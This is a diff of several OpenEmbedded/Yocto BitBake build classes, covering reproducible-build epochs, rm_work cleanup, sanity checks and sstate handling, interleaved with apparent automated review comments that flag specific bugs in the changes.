# QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
+# e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
#
# QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
#
@@ -75,7 +76,7 @@
QB_MEM ?= "-m 256"
QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
-QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}"
+QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
QB_DEFAULT_FSTYPE ?= "ext4"
QB_OPT_APPEND ?= "-show-cursor"
QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"
diff --git a/meta/classes/report-error.bbclass b/meta/classes/report-error.bbclass
index 1a12db1206..de48e4ff0f 100644
--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
data['failures'] = []
data['component'] = " ".join(e.getPkgs())
data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
+ data['bitbake_version'] = e.data.getVar("BB_VERSION")
+ data['layer_version'] = get_layers_branch_rev(e.data)
data['local_conf'] = get_conf_data(e, 'local.conf')
data['auto_conf'] = get_conf_data(e, 'auto.conf')
lock = bb.utils.lockfile(datafile + '.lock')
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
# reproducible_build.bbclass
#
-# Sets SOURCE_DATE_EPOCH in each component's build environment.
+# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
+# The format is number of seconds since the system epoch.
+#
# Upstream components (generally) respect this environment variable,
# using it in place of the "current" date and time.
# See https://reproducible-builds.org/specs/source-date-epoch/
#
-# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH.
-# This value should be reproducible for anyone who builds the same revision from the same sources.
+# The default value of SOURCE_DATE_EPOCH comes from the function
+# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
+# is not available (or set to 0) will use the fallback of
+# SOURCE_DATE_EPOCH_FALLBACK.
+#
+# The SDE_FILE is normally constructed from the function
+# create_source_date_epoch_stamp which is typically added as a postfuncs to
+# the do_unpack task. If a recipe does NOT have do_unpack, it should be added
+# to a task that runs after the source is available and before the
+# do_deploy_source_date_epoch task is executed.
+#
+# If a recipe wishes to override the default behavior it should set it's own
+# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
+# with recipe-specific functionality to write the appropriate
+# SOURCE_DATE_EPOCH into the SDE_FILE.
+#
+# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should
+# be reproducible for anyone who builds the same revision from the same
+# sources.
#
-# There are 4 ways we determine SOURCE_DATE_EPOCH:
+# There are 4 ways the create_source_date_epoch_stamp function determines what
+# becomes SOURCE_DATE_EPOCH:
#
# 1. Use the value from __source_date_epoch.txt file if this file exists.
-# This file was most likely created in the previous build by one of the following methods 2,3,4.
+# This file was most likely created in the previous build by one of the
+# following methods 2,3,4.
# Alternatively, it can be provided by a recipe via SRC_URI.
#
# If the file does not exist:
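Review bot: The rewritten header comment tells recipes to override `do_deploy_source_date_epoch_stamp`, but the task this class defines and adds to SSTATETASKS is `do_deploy_source_date_epoch`, and the same comment uses that name a few lines earlier. A recipe author following the text would override a function that nothing runs and get the default epoch without any warning. The sentence should read `# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch task`, and "it's own" in the line before should be "its own". The list is still introduced as "4 ways" although it has five entries.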
@@ -22,25 +43,24 @@
# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ...
# This works for well-kept repositories distributed via tarball.
#
-# 4. Use the modification time of the youngest file in the source tree, if there is one.
+# 4. Use the modification time of the youngest file in the source tree, if
+# there is one.
# This will be the newest file from the distribution tarball, if any.
#
-# 5. Fall back to a fixed timestamp.
+# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
#
-# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE.
-# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
-# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
-#
-# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
-# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
+# Once the value is determined, it is stored in the recipe's SDE_FILE.
BUILD_REPRODUCIBLE_BINARIES ??= '1'
-inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')}
+inherit reproducible_build_simple
-SDE_DIR ="${WORKDIR}/source-date-epoch"
+SDE_DIR = "${WORKDIR}/source-date-epoch"
SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
+# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
+export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
+
SSTATETASKS += "do_deploy_source_date_epoch"
do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
import oe.reproducible
epochfile = d.getVar('SDE_FILE')
- # If it exists we need to regenerate as the sources may have changed
- if os.path.isfile(epochfile):
- bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
- os.remove(epochfile)
+ tmp_file = "%s.new" % epochfile
source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
bb.utils.mkdirhier(d.getVar('SDE_DIR'))
- with open(epochfile, 'w') as f:
+ with open(tmp_file, 'w') as f:
f.write(str(source_date_epoch))
+
+ os.rename(tmp_file, epochfile)
}
+EPOCHTASK = "do_deploy_source_date_epoch"
+
+# Generate the stamp after do_unpack runs
+do_unpack[postfuncs] += "create_source_date_epoch_stamp"
+
def get_source_date_epoch_value(d):
- cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH')
- if cached:
+ epochfile = d.getVar('SDE_FILE')
+ cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
+ if cached and efile == epochfile:
return cached
- epochfile = d.getVar('SDE_FILE')
- source_date_epoch = 0
- if os.path.isfile(epochfile):
+ if cached and epochfile != efile:
+ bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
+
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
+ try:
with open(epochfile, 'r') as f:
s = f.read()
try:
source_date_epoch = int(s)
except ValueError:
- bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s)
- source_date_epoch = 0
+ bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
- else:
+ except FileNotFoundError:
bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
- d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch))
+ d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
return str(source_date_epoch)
export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
-
-python () {
- if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
- d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
-}
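Review bot: `get_source_date_epoch_value` still returns a stamp value of `0` unchanged, although the new class header says an SDE_FILE "set to 0" falls back to SOURCE_DATE_EPOCH_FALLBACK. Adding `if source_date_epoch == 0: source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))` right after `source_date_epoch = int(s)` would make the code match the comment. Separately, `except FileNotFoundError` no longer tolerates the cases the old `os.path.isfile` test skipped, for example SDE_FILE being a directory, so those now surface as a traceback during variable expansion; a comment should say whether that is intended. create_source_date_epoch_stamp begins above this hunk.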
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
do_rm_work () {
+ # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
+ # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
+ RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
+ if [ -z "${RM_BIN}" ]; then
+ bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
+ fi
+
# If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
for p in ${RM_WORK_EXCLUDE}; do
if [ "$p" = "${PN}" ]; then
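Review bot: The shell variable introduced here is referenced as `${RM_BIN}`, which is also the syntax BitBake expands in shell task bodies when a datastore variable of that name exists. It works only as long as no layer or configuration defines RM_BIN; if one does, the test and every later `"${RM_BIN}" -f -- $i` in this function would use that value instead of the path resolved from HOSTTOOLS_DIR. Writing the shell variable without braces, `if [ -z "$RM_BIN" ]; then` and `"$RM_BIN" -rf -- $dir`, keeps it out of BitBake's expansion; this also applies to the three later hunks in this file. The body of do_rm_work continues outside the hunk.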
@@ -73,7 +80,7 @@ do_rm_work () {
# sstate version since otherwise we'd need to leave 'plaindirs' around
# such as 'packages' and 'packages-split' and these can be large. No end
# of chain tasks depend directly on do_package anymore.
- rm -f $i;
+ "${RM_BIN}" -f -- $i;
;;
*_setscene*)
# Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
;;
esac
done
- rm -f $i
+ "${RM_BIN}" -f -- $i
esac
done
@@ -100,9 +107,9 @@ do_rm_work () {
# Retain only logs and other files in temp, safely ignore
# failures of removing pseudo folers on NFS2/3 server.
if [ $dir = 'pseudo' ]; then
- rm -rf $dir 2> /dev/null || true
+ "${RM_BIN}" -rf -- $dir 2> /dev/null || true
elif ! echo "$excludes" | grep -q -w "$dir"; then
- rm -rf $dir
+ "${RM_BIN}" -rf -- $dir
fi
done
}
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
# Zap the root password if debug-tweaks feature is not enabled
-ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}'
+ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
# Create /etc/timestamp during image construction to give a reasonably sane default time setting
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; "
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
# Generates test data file with data store variables expanded in json format
-ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; "
+ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
# Write manifest
IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
if os.path.exists(manifest_name) and link_name:
manifest_link = deploy_dir + "/" + link_name + ".manifest"
- if os.path.lexists(manifest_link):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
+ if manifest_link != manifest_name:
+ if os.path.lexists(manifest_link):
+ os.remove(manifest_link)
+ os.symlink(os.path.basename(manifest_name), manifest_link)
}
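Review bot: The new guard `if manifest_link != manifest_name:` compares raw strings, and `manifest_link` is built by concatenation (`deploy_dir + "/" + link_name + ".manifest"`) while `manifest_name` comes from a separately expanded variable. If the two name the same file with different spelling, such as a doubled or trailing slash, the guard passes, `os.remove` deletes the real manifest and the symlink then points at itself. Comparing normalised paths avoids that: `if os.path.normpath(manifest_link) != os.path.normpath(manifest_name):`. The same applies to `testdata_link != testdata_name` in the write_image_test_data hunk below. Both functions start outside their hunks.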
# Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
}
rootfs_check_host_user_contaminated () {
- contaminated="${WORKDIR}/host-user-contaminated.txt"
+ contaminated="${S}/host-user-contaminated.txt"
HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
@@ -339,9 +340,10 @@ python write_image_test_data() {
if os.path.exists(testdata_name) and link_name:
testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
- if os.path.lexists(testdata_link):
- os.remove(testdata_link)
- os.symlink(os.path.basename(testdata_name), testdata_link)
+ if testdata_link != testdata_name:
+ if os.path.lexists(testdata_link):
+ os.remove(testdata_link)
+ os.symlink(os.path.basename(testdata_name), testdata_link)
}
write_image_test_data[vardepsexclude] += "TOPDIR"
diff --git a/meta/classes/rootfs_deb.bbclass b/meta/classes/rootfs_deb.bbclass
index 2b93796a76..ef616da229 100644
--- a/meta/classes/rootfs_deb.bbclass
+++ b/meta/classes/rootfs_deb.bbclass
@@ -7,7 +7,7 @@ ROOTFS_PKGMANAGE = "dpkg apt"
do_rootfs[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot"
do_populate_sdk[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot bzip2-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_deb do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
do_populate_sdk[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
diff --git a/meta/classes/rootfs_ipk.bbclass b/meta/classes/rootfs_ipk.bbclass
index e73d2bfdae..f1e0219732 100644
--- a/meta/classes/rootfs_ipk.bbclass
+++ b/meta/classes/rootfs_ipk.bbclass
@@ -11,7 +11,7 @@ ROOTFS_PKGMANAGE = "opkg ${EXTRAOPKGCONFIG}"
do_rootfs[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_populate_sdk[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_ipk do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${WORKDIR}/ipk.lock"
do_populate_sdk[lockfiles] += "${WORKDIR}/ipk.lock"
diff --git a/meta/classes/rootfs_rpm.bbclass b/meta/classes/rootfs_rpm.bbclass
index 51f89ea990..ae0f541c49 100644
--- a/meta/classes/rootfs_rpm.bbclass
+++ b/meta/classes/rootfs_rpm.bbclass
@@ -24,7 +24,7 @@ do_rootfs[depends] += "${RPMROOTFSDEPENDS}"
do_populate_sdk[depends] += "${RPMROOTFSDEPENDS}"
do_rootfs[recrdeptask] += "do_package_write_rpm do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
python () {
if d.getVar('BUILD_IMAGES_FROM_FEEDS'):
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
ROOTFS_DEBUG_FILES ?= ""
ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;"
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
rootfs_debug_files () {
#!/bin/sh -e
echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 1486cce357..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
if len(msg) == 0:
msg = "%s.\n" % err
- msg += " Please ensure your host's network is configured correctly,\n"
- msg += " or set BB_NO_NETWORK = \"1\" to disable network access if\n"
- msg += " all required sources are on local disk.\n"
+ msg += " Please ensure your host's network is configured correctly.\n"
+ msg += " If your ISP or network is blocking the above URL,\n"
+ msg += " try with another domain name, for example by setting:\n"
+ msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
+ msg += " You could also set BB_NO_NETWORK = \"1\" to disable network\n"
+ msg += " access if all required sources are on local disk.\n"
retval = msg
return retval
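Review bot: The added line `msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""` is the only one in the block without a trailing `\n`, so the suggested setting and the following "You could also set BB_NO_NETWORK" sentence are printed on one line. A user copying the suggestion from the error output could easily pick up the extra text. The line should end with `\"https://www.example.com/\"\n"`. check_connectivity starts above this hunk.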
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
version = result.split()[3]
if LooseVersion(version) < LooseVersion("1.28"):
return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
+
+ try:
+ result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
+ if "--xattrs" not in result:
+ return "Your tar doesn't support --xattrs, please use GNU tar.\n"
+ except subprocess.CalledProcessError as e:
+ return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
+
return None
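Review bot: In the new `except subprocess.CalledProcessError` branch, `e.output` is still bytes because only the successful result is decoded, so the message shows a `b'...'` repr with escaped newlines instead of tar's actual output. Decoding it as well, `return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output.decode('utf-8', errors='replace'))`, keeps the diagnostic readable. The start of check_tar_version is outside this hunk.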
# We use git parameters and functionality only found in 1.7.8 or later
@@ -619,6 +630,9 @@ def sanity_handle_abichanges(status, d):
f.write(current_abi)
elif int(abi) <= 11 and current_abi == "12":
status.addresult("The layout of TMPDIR changed for Recipe Specific Sysroots.\nConversion doesn't make sense and this change will rebuild everything so please delete TMPDIR (%s).\n" % d.getVar("TMPDIR"))
+ elif int(abi) <= 13 and current_abi == "14":
+ status.addresult("TMPDIR changed to include path filtering from the pseudo database.\nIt is recommended to use a clean TMPDIR with the new pseudo path filtering so TMPDIR (%s) would need to be removed to continue.\n" % d.getVar("TMPDIR"))
+
elif (abi != current_abi):
# Code to convert from one ABI to another could go here if possible.
status.addresult("Error, TMPDIR has changed its layout version number (%s to %s) and you need to either rebuild, revert or adjust it at your own risk.\n" % (abi, current_abi))
@@ -700,6 +714,23 @@ def check_sanity_version_change(status, d):
if (tmpdirmode & stat.S_ISUID):
status.addresult("TMPDIR is setuid, please don't build in a setuid directory")
+ # Check that a user isn't building in a path in PSEUDO_IGNORE_PATHS
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ workdir = d.getVar('WORKDIR', expand=True)
+ for i in pseudoignorepaths:
+ if i and workdir.startswith(i):
+ status.addresult("You are building in a path included in PSEUDO_IGNORE_PATHS " + str(i) + " please locate the build outside this path.\n")
+
+ # Check if PSEUDO_IGNORE_PATHS and and paths under pseudo control overlap
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ pseudo_control_dir = "${D},${PKGD},${PKGDEST},${IMAGEROOTFS},${SDK_OUTPUT}"
+ pseudocontroldir = d.expand(pseudo_control_dir).split(",")
+ for i in pseudoignorepaths:
+ for j in pseudocontroldir:
+ if i and j:
+ if j.startswith(i):
+ status.addresult("A path included in PSEUDO_IGNORE_PATHS " + str(i) + " and the path " + str(j) + " overlap and this will break pseudo permission and ownership tracking. Please set the path " + str(j) + " to a different directory which does not overlap with pseudo controlled directories. \n")
+
# Some third-party software apparently relies on chmod etc. being suid root (!!)
import stat
suid_check_bins = "chown chmod mknod".split()
@@ -784,6 +815,11 @@ def check_sanity_everybuild(status, d):
if "." in paths or "./" in paths or "" in paths:
status.addresult("PATH contains '.', './' or '' (empty element), which will break the build, please remove this.\nParsed PATH is " + str(paths) + "\n")
+ #Check if bitbake is present in PATH environment variable
+ bb_check = bb.utils.which(d.getVar('PATH'), 'bitbake')
+ if not bb_check:
+ bb.warn("bitbake binary is not found in PATH, did you source the script?")
+
# Check whether 'inherit' directive is found (used for a class to inherit)
# in conf file it's supposed to be uppercase INHERIT
inherit = d.getVar('inherit')
@@ -857,13 +893,18 @@ def check_sanity_everybuild(status, d):
except:
pass
- oeroot = d.getVar('COREBASE')
- if oeroot.find('+') != -1:
- status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.")
- if oeroot.find('@') != -1:
- status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.")
- if oeroot.find(' ') != -1:
- status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.")
+ for checkdir in ['COREBASE', 'TMPDIR']:
+ val = d.getVar(checkdir)
+ if val.find('..') != -1:
+ status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
+ if val.find('+') != -1:
+ status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
+ if val.find('@') != -1:
+ status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
+ if val.find(' ') != -1:
+ status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
+ if val.find('%') != -1:
+ status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
# Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
import re
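Review bot: The added `%` check at the end of the loop raises instead of reporting, because its message is itself %-formatted and contains bare percent signs: `(%)` and `any % characters` are parsed as conversion specifiers, so Python raises ValueError on exactly the paths this branch is meant to flag. Escape them as `(%%)` and `any %% characters`, keeping the single `%s` for `checkdir`. Separately, `d.getVar(checkdir)` is used without a None check, so an unset variable would fail on `val.find`; whether that can happen at this point is not visible here. check_sanity_everybuild starts and continues outside the hunk.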
diff --git a/meta/classes/scons.bbclass b/meta/classes/scons.bbclass
index 6b171ca8df..4f3ae502ef 100644
--- a/meta/classes/scons.bbclass
+++ b/meta/classes/scons.bbclass
@@ -5,7 +5,6 @@ DEPENDS += "python3-scons-native"
EXTRA_OESCONS ?= ""
do_configure() {
- unset _PYTHON_SYSCONFIGDATA_NAME
if [ -n "${CONFIGURESTAMPFILE}" ]; then
if [ -e "${CONFIGURESTAMPFILE}" -a "`cat ${CONFIGURESTAMPFILE}`" != "${BB_TASKHASH}" -a "${CLEANBROKEN}" != "1" ]; then
${STAGING_BINDIR_NATIVE}/scons --clean PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS}
@@ -17,13 +16,11 @@ do_configure() {
}
scons_do_compile() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons ${PARALLEL_MAKE} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} || \
die "scons build execution failed."
}
scons_do_install() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons install_root=${D}${prefix} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} install || \
die "scons install execution failed."
}
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index 66a96a7603..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
components = spec.split(":")
# Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
# 7 is for the separators
- avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
+ avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
components[2] = components[2][:avail]
components[3] = components[3][:avail]
components[4] = components[4][:avail]
@@ -72,6 +72,7 @@ BB_HASHFILENAME = "False ${SSTATE_PKGSPEC} ${SSTATE_SWSPEC}"
SSTATE_ARCHS = " \
${BUILD_ARCH} \
+ ${BUILD_ARCH}_${ORIGNATIVELSBSTRING} \
${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS} \
${BUILD_ARCH}_${TARGET_ARCH} \
${SDK_ARCH}_${SDK_OS} \
@@ -80,6 +81,7 @@ SSTATE_ARCHS = " \
${PACKAGE_ARCH} \
${PACKAGE_EXTRA_ARCHS} \
${MACHINE_ARCH}"
+SSTATE_ARCHS[vardepsexclude] = "ORIGNATIVELSBSTRING"
SSTATE_MANMACH ?= "${SSTATE_PKGARCH}"
@@ -315,6 +317,8 @@ def sstate_install(ss, d):
if os.path.exists(i):
with open(i, "r") as f:
manifests = f.readlines()
+ # We append new entries, we don't remove older entries which may have the same
+ # manifest name but different versions from stamp/workdir. See below.
if filedata not in manifests:
with open(i, "a+") as f:
f.write(filedata)
@@ -477,7 +481,7 @@ def sstate_clean_cachefiles(d):
ss = sstate_state_fromvars(ld, task)
sstate_clean_cachefile(ss, ld)
-def sstate_clean_manifest(manifest, d, prefix=None):
+def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
import oe.path
mfile = open(manifest)
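Review bot: `canrace` is inserted ahead of `prefix` in the signature, so a caller that still passes the prefix positionally as the third argument now sets `canrace` to a truthy path and leaves `prefix=None`, without any error. The callers changed in this commit use keywords, but callers in other layers are not visible here. Adding the new parameter after the existing one, `def sstate_clean_manifest(manifest, d, prefix=None, canrace=False):`, keeps old positional calls working. The function body continues outside the hunk.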
@@ -495,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
if entry.endswith("/"):
if os.path.islink(entry[:-1]):
os.remove(entry[:-1])
- elif os.path.exists(entry) and len(os.listdir(entry)) == 0:
+ elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
+ # Removing directories whilst builds are in progress exposes a race. Only
+ # do it in contexts where it is safe to do so.
os.rmdir(entry[:-1])
else:
os.remove(entry)
@@ -533,7 +539,7 @@ def sstate_clean(ss, d):
for lock in ss['lockfiles']:
locks.append(bb.utils.lockfile(lock))
- sstate_clean_manifest(manifest, d)
+ sstate_clean_manifest(manifest, d, canrace=True)
for lock in locks:
bb.utils.unlockfile(lock)
@@ -634,10 +640,21 @@ python sstate_hardcode_path () {
def sstate_package(ss, d):
import oe.path
+ import time
tmpdir = d.getVar('TMPDIR')
+ fixtime = False
+ if ss['task'] == "package":
+ fixtime = True
+
+ def fixtimestamp(root, path):
+ f = os.path.join(root, path)
+ if os.lstat(f).st_mtime > sde:
+ os.utime(f, (sde, sde), follow_symlinks=False)
+
sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
+ sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
d.setVar("SSTATE_CURRTASK", ss['task'])
bb.utils.remove(sstatebuild, recurse=True)
bb.utils.mkdirhier(sstatebuild)
